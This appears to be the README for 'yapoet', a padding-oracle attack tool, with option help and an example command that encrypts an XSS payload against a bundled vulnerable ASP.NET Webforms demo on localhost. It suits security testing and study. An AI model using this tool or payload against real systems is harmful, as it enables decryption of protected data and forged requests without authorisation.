Comprehensive description will be added later. Presently you can try to play with it against included example of a vulnerable ASP.NET Webforms application:
\Examples\ASP.NET-Webforms\BuildAndRun.cmd
python yapoet.py -u http://localhost:8080/ -d "aEMei5bwchHQqb6rh17Irg==" -e "<script>alert(/XSS/)</script>" --data="__VIEWSTATE=&Answer=&EncryptedAnswer=%encrypted_data%"
yapoet.py [options]
Options:
-h, --help show this help message and exit
-u URL, --url=URL Target URL (e.g. "http://host.domain/?param1=value%2b1¶m2=value%2b2")
-d ENCRYPTED_DATA, --decrypt=ENCRYPTED_DATA
Base64-encoded data to decrypt
-e PLAINTEXT_DATA, --encrypt=PLAINTEXT_DATA
Plaintext data to encrypt (CBC mode only)
--data=POST_DATA POST data (e.g. "param1=value%2b1¶m2=value%2b1")
--cookie=COOKIE HTTP Cookie header value
--block-size=BLOCK_SIZE
Cipher block size [default: 16]
--iv=IV Initialization vector (e.g. "0x00,0x01,0x39...") [default: 0x00 * BLOCK_SIZE]
--mode=MODE Mode of operation (e.g. "ECB" or "CBC") [default: CBC]
--encode-func=ENCODE_FUNC
Function to encode byte array data to string [default: lambda byte_array:
__import__('base64').b64encode(byte_array)]
--decode-func=DECODE_FUNC
Function to decode string from byte array data [default: lambda string:
__import__('base64').b64decode(string)]
Please note that the value of at least one of the HTTP-request parameters in the URL, POST_DATA or COOKIE
options should be replaced with an %encrypted_data% placeholder.